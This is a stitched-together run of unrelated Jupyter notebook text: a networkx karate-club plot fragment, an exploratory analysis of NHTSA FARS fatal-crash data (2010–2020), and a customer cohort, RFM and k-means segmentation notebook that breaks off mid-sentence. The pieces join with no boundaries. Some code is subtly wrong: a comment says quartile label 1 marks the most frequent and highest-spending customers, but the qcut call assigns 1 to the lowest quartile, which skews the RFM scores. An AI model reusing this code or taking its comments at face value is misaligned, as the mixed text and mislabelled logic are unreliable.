# Create a new node attribute with the club membership being numeric club_membership = nx.get_node_attributes(karate_club_net,'club') club_dict = {'' : 0, "Officer" : 1} club_membership = {key : club_dict[value] for key, value in club_membership.items()} nx.set_node_attributes(karate_club_net, club_membership, "club_membership_numeric") # Plot the network _ = nx.draw(karate_club_net, pos, edge_color='dimgrey', node_color= list(nx.get_node_attributes(karate_club_net,'club_membership_numeric').values()), with_labels=True, cmap=plt.cm.Set1) plt.title("Club membership after fission")Project5: First Responders **Problem Satatement**First Responders want to be better prepared by the time they reach an accident site Based on vehicle information, personal data, time of day, weather conditions, how many fatalities and what level of injury severity to expect? What are the worst days/times when they should be appropriately staffed? What can be done to reduce the number of fatalities and severity of injuries? In spite of all the advances in technology, safety features - multiple airbags, collision avoidance warning lights - and better enforcement of seat-belt use, helmets for motorcycles, bicycles - the number of fatalities has been increasing over the years. Are there certain days or times of day when the fatalities are larger? **Data Source****National Highway Traffic Safety Administration’s (NHTSA) Fatality Analysis Reporting System (FARS)/Crash Report Sampling System (CRSS)** FARS contains data derived from a census of fatal motor vehicle traffic crashes in the 50 States, the District of Columbia, and Puerto Rico. To be included in FARS, a crash must involve a motor vehicle traveling on a trafficway customarily open to the public and must result in the death of at least one person (occupant of a vehicle or a non-motorist) within 30 days of the crash. FARS was conceived, designed, and developed by NHTSA’s National Center for Statistics and Analysis (NCSA) in 1975 to provide an overall measure of highway safety, to help identify traffic safety problems, to suggest solutions, and to help provide an objective basis to evaluate the effectiveness of motor vehicle safety standards and highway safety programs. **FARS data ‘dictionary’:** Fatality Analysis Reporting System (FARS) Analytical User’s Manual, 1975-2020: This multi-year analytical user’s manual provides documentation on the historical coding practices of FARS from 1975 to 2020. In other words, this manual presents the evolution of FARS coding from inception through present. The manual includes the data elements that are contained in FARS and other useful information that will enable the users to become familiar with the data system.Fatalities and Coding and Validation manual Provides more detailed definitions for each data element and attribute for a given year. US Census Bureau, Dept. of Labor, : for county population and location (latitude and longitude) data **Data summary**Downloaded FARS data from 2010-2020 (2.3 GB of data!) Each year comprised 23-36 .csv files 200+ features across all files Types of data available: Crash-level: Date/Time, GPS, Work Zone, EMS Arrival, Highway, etc. Vehicle-level: Type, Make/Model, Traveling Speed, Registration, Rollover, etc. Driver-level: Presence, License State/Zip/Status, Height, Speeding, etc. Precrash-level: Speed Limit, Roadway Grade, Distracted, Vision Obscured, etc. Person-level (MVO): Age, Sex, Seating Position, Air Bag, Ejection, etc. 
Person-level (NaMVO): Location, Alcohol test, Safety Equipment, etc. Automated merging of .csv files based on desired features FocusI focused on pre-crash analysis and the aident data. Precrash data analysis: PC 1-23 Dig into the following information from NHTSA's FARS data files (and corresponding csv file name) vehicle info: vehicle.csv driver's vision obscured by: vision.csv driver distracted: distract.csv driver maneuver to avoid: maneuver.csv weather at time of crash: weather.csv factors involved (tires, brakes): factor.csv Crash data is in the accident.csv file. It has data aggregated (by NHTSA) from the other files**Main areas** :1. Do EDA on pre-crash factors2. Create categories for the 99 Precrash events for better visualizations3. Create date_time index for accident4. Create 3 hour (and 2 hour and 4 hour) windows since these are the 'seasonality frequencies' for accidents and especially drunk drivers.import numpy as np import pandas as pd import matplotlib.pyplot as plt import datetime as dtGet the data from the NHTSA FARS website, extract files from the zips for years 2010-2020# Run kehinde_gather_data.ipynb first which downloads the data from the NHTSA FARS website and extracts the .zip files # into the folders by year. #folder = "FARS2020NationalCSV/" # Get data for these files for only 1 year folder = "2020_fars/" df_vehicle = pd.read_csv("./data/" + folder + "VEHICLE.CSV") df_vision = pd.read_csv("./data/" + folder + "VISION.CSV") df_distract = pd.read_csv("./data/" + folder + "DISTRACT.CSV") df_maneuver = pd.read_csv("./data/" + folder + "maneuver.CSV") df_weather = pd.read_csv("./data/" + folder + "weather.CSV") df_factor = pd.read_csv("./data/" + folder + "factor.CSV") #df_person = pd.read_csv("./data/" + folder + "PERSON.CSV") # Get accident data for all years #path = f'./data/{year}_fars/' #folderFARS = "FARS" #folderType = "NationalCSV/" folderFARS = "_fars" df_accident = pd.DataFrame() for i in range( 2010, 2021): folder_name = str(i) + folderFARS + "/" print(i, folder_name) df_accident = df_accident.append(pd.read_csv("./data/" + folder_name + "accident.CSV")) # Make column names lowercase df_vehicle.columns = df_vehicle.columns.str.lower() df_vision.columns = df_vision.columns.str.lower() df_distract.columns = df_distract.columns.str.lower() df_maneuver.columns = df_maneuver.columns.str.lower() df_weather.columns = df_weather.columns.str.lower() df_accident.columns = df_accident.columns.str.lower() df_factor.columns = df_factor.columns.str.lower() # Check all years are showing df_accident['year'].value_counts() # Reset index to sort across all years df_accident.reset_index(drop=True, inplace=True) # Keep only required columns from accident to conserve space, memory, time # C7, C17, C18, 19, C20, C24-C30...: 47 columns accident_cols = [ 'YEAR', "MONTH", "MONTHNAME", "DAY", "DAY_WEEK", "DAY_WEEKNAME", "HOUR", "HOURNAME", "MINUTE", "STATE", "STATENAME", "COUNTY", "COUNTYNAME", "ST_CASE", "VE_TOTAL", "VE_FORMS", "PVH_INVL", "PEDS", "PERSONS", "CITY", "CITYNAME", "LATITUDE", "LONGITUD", "HARM_EV", "HARM_EVNAME", "MAN_COLL", "MAN_COLLNAME", "WRK_ZONE", "WRK_ZONENAME", "REL_ROAD", "REL_ROADNAME", "LGT_COND", "LGT_CONDNAME", "WEATHER", "WEATHERNAME", "SCH_BUS", "SCH_BUSNAME", "NOT_HOUR", "NOT_HOURNAME", "NOT_MIN", "NOT_MINNAME", "ARR_HOUR", "ARR_HOURNAME", "ARR_MIN", "ARR_MINNAME", "FATALS", "DRUNK_DR"] # Convert to lower case accident_cols = [ c.lower() for c in accident_cols] # Keep only these columns df_accident = df_accident[accident_cols] df_accident.info() # 47 cols, 
35MB for 3 years; 120MB for 11 years, saved half memory # Only accident (crash) is done afor all years. For remaining, just do for latest year for EDA # Precrash - from vehicle csv File # PC5-13, 17, 19-23: 15 items in vehicle.csv # Not in vehicle file: 14, 15, 16, 18 (in other .csvs) # These column names are in the XLS and as per the Validation and User Manauls # Subset columns for easier viewing cols = ["VTRAFWAY", "VNUM_LAN", "VSPD_LIM", "VALIGN", "VPROFILE", "VPAVETYP", "VSURCOND", "VTRAFCON", "VTCONT_F", "P_CRASH1", "P_CRASH2", "P_CRASH3", "PCRASH4", "PCRASH5", "ACC_TYPE"] # code column header and code name column header from XLS files (names are NOT mentioned in the manuals) cols_with_names = ["VTRAFWAY", "VTRAFWAYNAME", "VNUM_LAN", "VNUM_LANNAME", "VSPD_LIM", "VSPD_LIMNAME", "VALIGN", "VALIGNNAME", "VPROFILE", "VPROFILENAME", "VPAVETYP", "VSURCOND", "VTRAFCON", "VTCONT_F", "P_CRASH1", "P_CRASH2", "P_CRASH3", "PCRASH4", "PCRASH5", "ACC_TYPE", "ACC_TYPENAME"] # Subset of names for display purposes cols_main_names= ["VTRAFWAY", "VNUM_LAN", "VSPD_LIM", "VALIGN", "VPROFILE", "VPAVETYP", "VSURCOND", "VTRAFCON", "VTCONT_F", "P_CRASH1", "P_CRASH2", "P_CRASH2NAME", "P_CRASH3", "PCRASH4", "PCRASH5", "ACC_TYPE", "ACC_TYPENAME"] cols_veh_prev_hist = ["DEATHS", "DR_DRINK", "PREV_ACC", "PREV_ACCNAME", "PREV_SUS1", "PREV_SUS1NAME", "PREV_SUS2", "PREV_SUS2NAME", "PREV_SUS3", "PREV_SUS3NAME", "PREV_DWI", "PREV_DWINAME", "PREV_SPD", "PREV_SPDNAME", "PREV_OTH", "PREV_OTHNAME"] # Convert to lower case cols = [ c.lower() for c in cols] cols_with_names = [ c.lower() for c in cols_with_names] cols_main_names = [ c.lower() for c in cols_main_names] cols_veh_prev_hist = [ c.lower() for c in cols_veh_prev_hist] #df_accident.loc[df_accident["year"]==2020][["peds", "fatals", "persons", "ve_total"]].sum()Data Cleanup and EDAThere are many columns in this detailed dataset. 
Look through the obvious ones to see if there is anything obvious for further investigation.df_vehicle.loc[ df_vehicle["prev_acc"]== 98 ][["deaths", "dr_drink", "prev_dwi","prev_acc", "prev_sus1", "prev_sus2", "prev_sus3", "prev_spd" ]].sort_values(by = "prev_dwi", ascending = True).head(30) # set "prev_acc"== 98 or 99 to 0 since they don't matter for DWI # Clean up prev_accidents #df_vehicle['prev_acc'] = [0 if ((a==98) | (a==99)) else a for a in df_vehicle['prev_acc']] # Clean up prev_sus1 df_vehicle['prev_sus1'].value_counts() #69 had 1 prev underage suspension for zero-tolerance alcohol violations; 96 had 1 or more underage suspensions; 12 people had 3 or more #df_vehicle['prev_sus1'] = [0 if ((a==99) | (a==998)) else a for a in df_vehicle['prev_sus1']] # Clean up prev_sus2 df_vehicle['prev_sus2'] = [0 if ((a==99) | (a==998)) else a for a in df_vehicle['prev_sus2']] df_vehicle['prev_sus2'].value_counts() #704 had 1 prev BAC above a specified limit (not BAC violations) # Clean up prev_sus3 df_vehicle['prev_sus3'] = [0 if ((a==99) | (a==998)) else a for a in df_vehicle['prev_sus3']] df_vehicle['prev_sus3'].value_counts() #3276 had 1 prev drug violation # (1,98) are values with prior violations/DWI df_vehicle.loc[ ( df_vehicle["prev_dwi"] > 4 ) & (df_vehicle["prev_dwi"] < 99 ) ][["deaths", "dr_drink", "prev_dwi","prev_acc", "prev_sus1", "prev_sus2", "prev_sus3", "prev_spd" ]].sort_values(by = "prev_dwi", ascending = False).plot( kind="barh", title="Drivers with more than 4 previous DWI convictions"); #df_vehicle.loc[ ( df_vehicle["prev_dwi"] > 1 ) & (df_vehicle["prev_dwi"] < 99 ) ][["deaths", "dr_drink", "prev_dwi","prev_acc", "prev_sus1", # "prev_sus2", "prev_sus3", "prev_spd" ]].sort_values(by = "prev_dwi", ascending = False).plot(kind="barh") #1739 drivers had prev dwi convictions in past 5 years; ; 294 had more than 1 prior DWI; 52 had more than 2(44 deaths, ); 18 more than 3, 14 deaths; 852 drinking drivers; 1358 deaths #df_vehicle.loc[ ( df_vehicle["prev_dwi"] > 0 ) & (df_vehicle["prev_dwi"] < 99 ) ][["deaths", "dr_drink", "prev_acc", "prev_sus1", "prev_dwi" ]].sum().plot(kind="barh") # pre-crash reasons df_vehicle[["p_crash2", "p_crash2name"]].head(10) # Create categories for Pre-crash crit events. # This categorical data is much more meaningful (and useful) for modeling. 
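# A vectorized sketch of the same mapping built by the loop below (the code ranges are taken
# from the category list that follows). np.select assigns the numeric category in one pass
# instead of iterating row by row; the result is stored in a separate column here so it can
# be compared with the loop's output. The loop below also fills in the category names.
conds = [df_vehicle['p_crash2'].between(1, 9),
         df_vehicle['p_crash2'].between(10, 21),
         df_vehicle['p_crash2'].between(50, 59),
         df_vehicle['p_crash2'].between(60, 78),
         df_vehicle['p_crash2'].between(80, 85),
         df_vehicle['p_crash2'].between(87, 92),
         df_vehicle['p_crash2'] == 98]
df_vehicle['crit_event_category_vec'] = np.select(conds, [1, 2, 3, 4, 5, 6, 7], default=9)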
''' Values and descriptions of the categories (matches the Manuals) 1 This Vehicle Loss of Control Due to: 2 This Vehicle Traveling 3 Other Motor Vehicle in Lane 4 Other Motor Vehicle Encroaching into Lane 5 Pedestrian or Pedalcyclist or Other Non-Motorist 6 Object or Animal 7 Other 9 Unknown ''' for i in range( df_vehicle.shape[0]): e = df_vehicle.loc[i, 'p_crash2'] #print( {i}, {e}) if e >=1 and e <= 9: df_vehicle.loc[i, 'crit_event_category'] = 1 df_vehicle.loc[i, 'crit_event_cat_name'] = "This lost control" elif e >=10 and e <= 21: df_vehicle.loc[i, 'crit_event_category'] = 2 df_vehicle.loc[i, 'crit_event_cat_name'] = "This traveling" elif e >=50 and e <= 59: df_vehicle.loc[i, 'crit_event_category'] = 3 df_vehicle.loc[i, 'crit_event_cat_name'] = "Other Motor Vehicle in Lane" elif e >=60 and e <= 78: df_vehicle.loc[i, 'crit_event_category'] = 4 df_vehicle.loc[i, 'crit_event_cat_name'] = "Other Motor Vehicle Encroaching into Lane" elif e >=80 and e <= 85: df_vehicle.loc[i, 'crit_event_category'] = 5 df_vehicle.loc[i, 'crit_event_cat_name'] = "Pedestrian or Pedalcyclist or Other Non-Motorist" elif e >=87 and e <= 92: df_vehicle.loc[i, 'crit_event_category'] = 6 df_vehicle.loc[i, 'crit_event_cat_name'] = "Object or Animal" elif e == 98: df_vehicle.loc[i, 'crit_event_category'] = 7 df_vehicle.loc[i, 'crit_event_cat_name'] = "Other" else: #e == 99: df_vehicle.loc[i, 'crit_event_category'] = 9 df_vehicle.loc[i, 'crit_event_cat_name'] = "Unknown" #print( i, e, df_vehicle.loc[i, 'crit_event_category'], df_vehicle.loc[i, 'crit_event_cat_name']) # This takes a minute to run, even for 54k records # Check the mapping from event to category is done properly #df_vehicle[["crit_event_category", "p_crash2"]].head(20) df_vehicle[["p_crash2", "crit_event_cat_name", "crit_event_category"]].head(20) # Plot the critical categories plt.figure( figsize=(4,4)); df_vehicle["crit_event_cat_name"].value_counts(normalize = True, ascending=True).plot(kind="barh", title="All Precrash Critical Categories"); plt.xlabel("Proportion of each category"); plt.ylabel("Precrash category"); # Plot all the Precrash events. Showing both the event code and number for easier comparison plt.figure( figsize=(10,12)) df_vehicle[["p_crash2", "p_crash2name"]].value_counts(normalize=True, ascending=True).plot(kind="barh", title="All Pre-crash Critical Events"); plt.xlabel("Proportion of each critical event", fontsize=12); plt.ylabel("Precrash critical event", fontsize=12); df_vehicle[["vsurcond", "vsurcondname"]].value_counts(normalize=True)*100 # This might be interesting for further deep dive. Wet conditions: 11%, Entering a trafficway or was in Driveway: 0.8%, Ice 0.6%, # Plot all the roadway surface conditions. Showing both the event code and number for easier comparison plt.figure( figsize=(6,4)) df_vehicle[["vsurcond", "vsurcondname"]].value_counts(normalize=True, ascending=True).plot(kind="barh", title="Roadway surface condition prior to Critical Precrash Event"); plt.xlabel("Proportion of each critical event", fontsize=12); plt.ylabel("Roadway surface condition", fontsize=12); # Now check if drivers vison was obscured from vision df df_vision.info() df_vision[["vision", "visionname"]].value_counts(normalize=True)*100 # Plot. 
Showing both the event code and number for easier comparison plt.figure( figsize=(6,4)) df_vision[["vision", "visionname"]].value_counts( ascending=True).plot(kind="barh", title="Driver's Vision Obscured By"); plt.xlabel("Number of each event", fontsize=12); plt.ylabel("Obscured By", fontsize=12); # Check if Driver was distracted df_distract[["drdistract", "drdistractname"]].value_counts(normalize=True)*100 # The thing(s) the driver attempted to avoid while the vehicle was on the road portion of the trafficway, # just prior to the first harmful event for this vehicle. #PC15. Maneuver.MANEUVER df_maneuver[["maneuver", "maneuvername"]].value_counts(normalize=True)*100 # PC4 - Contributing Circumstances, Motor Vehicle # Factor.VEHICLECC df_factor[["vehiclecc", "vehicleccname"]].value_counts(normalize=True)*100 # Tires contribute 1.1% to all fatal accidents! # What was the weather when the crash occured df_weather[["weather", "weathername"]].value_counts(normalize=True)*100Done with basic investigation of the pre-crash reasons. Now let's look at accident data# number of fatals. None of the records have zero fatals - i.e. the dataset ONLY contains accidents with at least one fatality df_accident['fatals'].value_counts() # Construction/Work zones df_accident[["wrk_zone", "wrk_zonename"]].value_counts(normalize=True)*100 #LGT_COND df_accident[["lgt_cond", "lgt_condname"]].value_counts(normalize=True)*100 #WEATHER df_accident[["weather", "weathername"]].value_counts(normalize=True)*100 #"REL_ROAD", "REL_ROADNAME" df_accident[["rel_road", "rel_roadname"]].value_counts(normalize=True)*100 # accidents per hour. No major standouts here. Hence we will break this up into chunks of multiple hours. df_accident['hour'].value_counts(normalize=True) # Create datetime column. # This is the timeseries index used in modeling # Unfortunately, we cannot use the standard pd.to_datetime functions since the FARS data has values of 98 and 99 which are considered # valid values and mess up the calculations. # df_accident["date_time"] = pd.to_datetime(df_accident[["year", "month", "day", "hour", "minute"]], errors='coerce') # If hour = 99 or minute = 99 -> set to NaT, equivalent of NaN. We'll drop these rows later for i in range (df_accident.shape[0]) : d = df_accident.iloc[i] if (d['hour'] < 99) & (d['minute'] < 99): # valid values dt = str(d["year"]) + "-" + str( d["month"]) + "-" + str( d["day"]) + " " + str( d["hour"]) + ":" + str( d["minute"]) #print( i, dt ) df_accident.loc[i, "date_time"] = pd.to_datetime(dt) else: # don't create an entry if invalid hour or minute?? df_accident.loc[i, "date_time"] = pd.NaT # NaT is the equivalent of NaN for datetime #print( i, d ) # takes 10 minutes for 10 years #df_accident df_accident[['year', "month", "day", "hour", "minute"]] df_accident["date_time"].isnull().sum() # 315 have null (NaT) in 2020; 787 in 2018-2020; 2618 in 10 years. # Less than 1% so can drop these rows # Drop the nulls first before using this as the index. 
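Before the NaT rows are dropped below: the row-by-row loop above is noted to take roughly 10 minutes for 10 years of data. A hedged, vectorized sketch of the same `date_time` construction (an alternative, not the notebook's original approach), assuming `df_accident` with integer `year`/`month`/`day`/`hour`/`minute` columns as above, is to parse only rows whose hour and minute are below the FARS unknown code and leave everything else as NaT:

```python
# Vectorized sketch of the date_time construction. Rows whose hour or minute
# carry the FARS "unknown" code (99) stay NaT, mirroring the loop's behaviour;
# errors="coerce" catches any other out-of-range combination.
import pandas as pd

valid = (df_accident["hour"] < 99) & (df_accident["minute"] < 99)
parts = df_accident.loc[valid, ["year", "month", "day", "hour", "minute"]]
df_accident["date_time"] = pd.NaT                      # default: missing timestamp
df_accident.loc[valid, "date_time"] = pd.to_datetime(parts, errors="coerce")
```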
(Keep the nonnulls) df_accident = df_accident.loc[df_accident["date_time"].notnull()] # confirm no nulls for date_time df_accident.isnull().sum() df_accident["date_time"].isnull().sum() # finally, no nulls in date_time column # Set this new date_time column to the index (for lag, ACF, PACF plots for trend and seasonality, and for the time series modeling for AR and RNN) df_accident = df_accident.set_index( "date_time") # Check info and make sure DatetimeIndex: 356445 entries, 2010-01-15 04:10:00 to 2020-12-24 09:25:00 df_accident.info() # Create a new column, which has the Day+hour with most accidents # Sun=1; Sat=7; # hour//3 for 3 hour window; # 3 hour window: 8 buckets of 3 hours each in a day; 7 days; buckets: 1 to 56 # 2 hour window: 12 buckets of 2 hours each in a day; 7 days; buckets: 1 to 84 # 4 hour window: 6 buckets of 4 hours each in a day; 7 days; buckets: 1 to 42 # Create columns for 3 hour window and its name (for graphs) # Create 2 or 4 hour windows too # 3 hour window df_accident["day_3hr_window"] = ((df_accident["day_week"]-1) * 8) + ( df_accident["hour"]//3) + 1 # starting from 1 df_accident["day_3hr_window_name"] = df_accident["day_weekname"] + " " + (( df_accident["hour"]//3)*3).astype(str) + ":00 to " + ((( df_accident["hour"]//3)*3)+3).astype(str) + ":00" # 2 hour window df_accident["day_2hr_window"] = ((df_accident["day_week"]-1) * 12) + ( df_accident["hour"]//2) + 1 # starting from 1 df_accident["day_2hr_window_name"] = df_accident["day_weekname"] + " " + (( df_accident["hour"]//2)*2).astype(str) + ":00 to " + ((( df_accident["hour"]//2)*2)+2).astype(str) + ":00" # 4 hour window df_accident["day_4hr_window"] = ((df_accident["day_week"]-1) * 6) + ( df_accident["hour"]//4) + 1 # starting from 1 df_accident["day_4hr_window_name"] = df_accident["day_weekname"] + " " + (( df_accident["hour"]//4)*4).astype(str) + ":00 to " + ((( df_accident["hour"]//4)*4)+4).astype(str) + ":00" df_accident[["day_week", "hour", "day_weekname", "day_2hr_window", "day_2hr_window_name", "day_3hr_window", "day_3hr_window_name", "day_4hr_window", "day_4hr_window_name"]] # Check looks good for Sunday since calcualtion check is easier df_accident[(df_accident['day_week'] == 1)][["day_week", "hour", "day_weekname", "day_2hr_window", "day_2hr_window_name", "day_3hr_window", "day_3hr_window_name", "day_4hr_window", "day_4hr_window_name"]].head() # Check looks good for all days df_accident[["day_week", "hour", "day_weekname", "day_2hr_window", "day_2hr_window_name", "day_3hr_window", "day_3hr_window_name", "day_4hr_window", "day_4hr_window_name"]].head() # Save the file (with date_time as index) for use in next notebook df_accident.to_csv("./data/accident_ts_10years.csv" )Customer Segmentation and Cohort Analysisimport numpy as np import pandas as pd data = pd.read_excel('/Users/khushal/Desktop/CustomerSegmentation/CSP3/Online-Retail.xlsx') data.head()Assigning a Daily Acquisition Cohortfrom datetime import datetime def get_month(x): return datetime(x.year,x.month,1) data['InvoiceMonth'] = data['InvoiceDate'].apply(get_month) grouping = data.groupby('CustomerID')['InvoiceMonth'] data['CohortMonth'] = grouping.transform('min') data.head()Extract Integer Values From Datadef get_date_int(df,column): year = df[column].dt.year month = df[column].dt.month day = df[column].dt.day return year,month,dayAssign Time Offset Valueinvoice_year,invoice_month, _ = get_date_int(data, 'InvoiceMonth') cohort_year, cohort_month, _ = get_date_int(data, 'CohortMonth') years_diff = invoice_year - cohort_year months_diff = 
invoice_month - cohort_month data['CohortIndex'] = years_diff * 12 + months_diff + 1 dataCount Monthly active customers from each cohortgrouping = data.groupby(['CohortMonth', 'CohortIndex']) # Count number of customers in each group by applying pandas nunique() function cohort_data = grouping['CustomerID'].apply(pd.Series.nunique) # Reset the index and create pandas pivot with CohortMonth cohort_data = cohort_data.reset_index() cohort_counts = cohort_data.pivot(index = 'CohortMonth', columns = 'CohortIndex', values = 'CustomerID') print(cohort_counts)CohortIndex 1.0 2.0 3.0 4.0 5.0 6.0 7.0 8.0 9.0 \ CohortMonth 2010-12-01 948.0 362.0 317.0 367.0 341.0 376.0 360.0 336.0 336.0 2011-01-01 421.0 101.0 119.0 102.0 138.0 126.0 110.0 108.0 131.0 2011-02-01 380.0 94.0 73.0 106.0 102.0 94.0 97.0 107.0 98.0 2011-03-01 440.0 84.0 112.0 96.0 102.0 78.0 116.0 105.0 127.0 2011-04-01 299.0 68.0 66.0 63.0 62.0 71.0 69.0 78.0 25.0 2011-05-01 279.0 66.0 48.0 48.0 60.0 68.0 74.0 29.0 NaN 2011-06-01 235.0 49.0 44.0 64.0 58.0 79.0 24.0 NaN NaN 2011-07-01 191.0 40.0 39.0 44.0 52.0 22.0 NaN NaN NaN 2011-08-01 167.0 42.0 42.0 42.0 23.0 NaN NaN NaN NaN 2011-09-01 298.0 89.0 97.0 36.0 NaN NaN NaN NaN NaN 2011-10-01 352.0 93.0 46.0 NaN NaN NaN NaN [...]Calculate Cohort Metrics We have assigned the cohorts and calculated the monthly offset for the metrics, now we will see how to calculate business metrics for these customer cohorts, We will start by using cohort counts table from above to calculate customer retention then we will calculate the average purchase quantity. The retention measures how many customers from each cohort have returned in the subsequent months. First Step : Select the First Column which is the total number of customers in the cohort Second Step: We will calculate the ratio of how many of these customers came back in the subsequent months which is the retention rate Note: You will see that the first month's retention - by defination will be 100% of all cohorts, This is because the number of active customers in the first month is actually the size of the cohort# Calculate Rentention Rate cohort_sizes = cohort_counts.iloc[:,0] retention = cohort_counts.divide(cohort_sizes, axis = 0) retention.round(3) * 100 # Calculate Average Quantity grouping = data.groupby(['CohortMonth', 'CohortIndex']) cohort_data = grouping['Quantity'].mean() cohort_data = cohort_data.reset_index() average_quantity = cohort_data.pivot(index = 'CohortMonth', columns = 'CohortIndex', values = 'Quantity') average_quantity.round(1)HeatMap for Visualizing Cohort Analysisretention.round(3) * 100 import seaborn as sns import matplotlib.pyplot as plt plt.figure(figsize=(10,8)) plt.title('Retentation Rates') sns.heatmap(data = retention, annot = True, fmt = '.0%', vmin = 0.0, vmax = 0.5, cmap = 'BuGn') plt.show() average_quantity.round(1) plt.figure(figsize=(8,6)) plt.title('Average Spend by Monthly Cohorts') sns.heatmap(data = average_quantity, annot = True, cmap = 'Blues')RFM Metrics RECENCY (R) - Which measures how recent was each customer's last purchase (Days since the last customer purchase) FREQUENCY (F) - Which measures how many purchases the customer has done in the last 12 months (Number of transactions in the last 12 months) MONETARY VALUE (M) - Which measures how much has the customer spent in the last 12 months (Total Spend in the last 12 months)data['TotalSum'] = data['UnitPrice'] * data['Quantity'] data.head() print ('Min:{};Max:{}'.format(min(data.InvoiceDate), max(data.InvoiceDate))) # Creating a hypothetical 
snapshot_day data, by adding one day to the max invoice date from datetime import datetime, date, time, timedelta snapshot_date = max(data.InvoiceDate) + timedelta(days = 1) snapshot_date # Aggregate date on a customer level datamart = data.groupby(['CustomerID']).agg({ 'InvoiceDate': lambda x : (snapshot_date - x.max()).days, 'InvoiceNo' : 'count', 'TotalSum' : 'sum'}) # Rename the columns for easier interpretation datamart.rename(columns = {'InvoiceDate' : 'Recency', 'InvoiceNo' : 'Frequency', 'TotalSum' : 'Monetary Value'}, inplace=True) datamart['Monetary Value'].round(1) datamart.head() # This will assign label to most recent customer as 4 and least recent customer as 1 r_labels = range(4,0,-1) r_quartiles = pd.qcut(datamart['Recency'], 4, labels = r_labels) datamart = datamart.assign(R = r_quartiles.values) datamart.head() # This will assign label to most frequent customer as 1 and least frequent customer as 4 # Also assign label most monetary value generating customer as 1 and least monetary value generating customer as 4 f_labels = range(1,5) m_labels = range(1,5) f_quartiles = pd.qcut(datamart['Frequency'], 4 , labels = f_labels) m_quartiles = pd.qcut(datamart['Monetary Value'], 4, labels = m_labels) datamart = datamart.assign(F = f_quartiles.values) datamart = datamart.assign(M = m_quartiles.values) datamart.head()Build RFM Segment and RFM Score 1. Concatenate RFM quartile values to RFM_Segment 2. Sum RFM quartiles values to RFM_Scoredatamart = datamart[['Recency','Frequency','Monetary Value', 'R','F','M']] def join_rfm(x): return str(x['R']) + str(x['F']) + str(x['M']) datamart['RFM_Segment'] = datamart.apply(join_rfm, axis = 1) datamart['RFM_Score'] = datamart[['R','F','M']].sum(axis = 1) datamart datamart.groupby('RFM_Segment').size().sort_values(ascending = False)[:10] datamart[datamart['RFM_Segment']=='111'].head(15) datamart.groupby('RFM_Score').agg( { 'Recency' : 'mean', 'Frequency': 'mean', 'Monetary Value' : ['mean','count'] } ).round(1)To Understand data better lets group them in named segmentsdef segment_me(df): if df['RFM_Score'] >= 9: return 'Gold' elif (df['RFM_Score'] >= 5) and (df['RFM_Score'] < 9): return 'Silver' else: return 'Bronze' datamart['General_Segment'] = datamart.apply(segment_me, axis = 1) datamart.groupby('General_Segment').agg( { 'Recency' : 'mean', 'Frequency' : 'mean', 'Monetary Value' : ['mean', 'count'] } ).round(1)Data Pre-processing for K-Means Clustering Exploring distribution of Recency and Frequencyimport seaborn as sns from matplotlib import pyplot as plt plt.subplot(2,1,1); sns.distplot(datamart['Recency']) plt.subplot(2,1,2); sns.distplot(datamart['Frequency']) plt.show()Data Transformations to manage Skewness### Logarithmic Transformation (Positive Values Only) import numpy as np frequency_log = np.log(datamart['Frequency']) sns.distplot(frequency_log) plt.show()NOTE Dealing with Negative Values 1. Adding a constant before log transformation 2. Cube Root transformationdatamart_rfm = datamart[['Recency','Frequency','Monetary Value','RFM_Score']] datamart_rfm.head() datamart_rfm.describe()Centering Variables with different means 1. K-means works well on variables with the same mean 2. Centering Variables is done by subracting average values from each observation.datamart_centered = datamart_rfm - datamart_rfm.mean() datamart_centered.describe().round(2)Scaling Variables with Different Variance 1. K-means works better on variables with the same variance and Standard Deviation. 2. 
Scaling variables is done by dividing them by standard deviation of each.# Scaling the Values datamart_scaled = datamart_rfm / datamart_rfm.std() datamart_scaled.describe().round(2)Combining Centering and Scaling 1. Subract mean and divide by standard deviation manually 2. Or use a scaler from scikit-learn library (returns numpy.ndarray object)### Using 2nd Method from sklearn.preprocessing import StandardScaler scaler = StandardScaler() scaler.fit(datamart_rfm) datamart_normalized = scaler.transform(datamart_rfm) datamart_normalized = pd.DataFrame(data=datamart_normalized, index=datamart_rfm.index, columns=datamart_rfm.columns) datamart_normalized.describe().round(2) # print ('mean:', datamart_normalized.mean(axis = 0).round(2)) # print ('std:' , datamart_normalized.std(axis = 0).round(2))Sequence of Structuring Pre-processing steps 1. Unskew the data -- Log Transformation 2. Standardize to the same average values 3. Scale to the separate standard deviation 4. Store as a separate array to be used for clustering Visualizing the Normalized Data# ## Unskew the data with log transformation # import numpy as np # datamart_log = np.log(datamart_rfm) # ## Normalize the variables with StandardScaler # from sklearn.preprocessing import StandardScaler # scaler = StandardScaler() # scaler.fit(datamart_log) # ## Store it separately for clustering # datamart_normalized = scaler.transform(datamart_log) # datamart_normalized = pd.DataFrame(data=datamart_normalized, index=datamart_rfm.index, columns=datamart_rfm.columns) # datamart_normalized.describe() plt.subplot(3,1,1); sns.distplot(datamart_normalized['Recency']) plt.subplot(3,1,2); sns.distplot(datamart_normalized['Frequency']) plt.subplot(3,1,3); sns.distplot(datamart_normalized['Monetary Value'])K- means Clustering Methods to define the number of clusters 1. Visual Methods - elbow criterion* Plot the number of clusters against within-cluster sum of squared errors (SSE) - Sum of Squared distances from every data point to their cluster center.* Identify the "elbow" in the plot* Elbow- a point representing an "optimal" number of clusters 2. Mathematical Methods - Silhouette Coefficient 3. 
Experimentation and Interpretation# Way to choose the number of clusters # Elbow Criterion Method from sklearn.cluster import KMeans import seaborn as sns from matplotlib import pyplot as plt # Fit KMeans and calculate SSE for each *k* sse = {} for k in range(1,11): kmeans = KMeans(n_clusters = k, random_state = 1) kmeans.fit(datamart_normalized) sse[k] = kmeans.inertia_ # Sum of Squared distances to closest cluster center # Plot SSE for each *k* plt.title('The Elbow Method') plt.xlabel('k');plt.ylabel('SSE') sns.pointplot(x=list(sse.keys()), y=list(sse.values())) plt.show()The Way to look at it is try to find the point with the largest angle which is so-called elbow, in the above graph the largest angle is at k = 4 Experimental Approach - analyze segments# 2-cluster approach # Import KMeans from sklearn library and initialize it as kmeans from sklearn.cluster import KMeans kmeans = KMeans(n_clusters = 2, random_state = 1) # Compute k-means clustering on pre-processed data kmeans.fit(datamart_normalized) # Extract cluster labels from labels_ attribute cluster_labels = kmeans.labels_ # Analyzing average RFM values of each cluster # Create a cluster label column in the original DataFrame datamart_rfm_k2 = datamart_rfm.assign(Cluster = cluster_labels) # Calculate average RFM values and size for each cluster datamart_rfm_k2.groupby(['Cluster']).agg({ 'Recency':'mean', 'Frequency' : 'mean', 'Monetary Value' : ['mean', 'count'] }).round(0)The results above is a simple table where we see how these two segments differ from each other, It's clear that segment 0 has customers 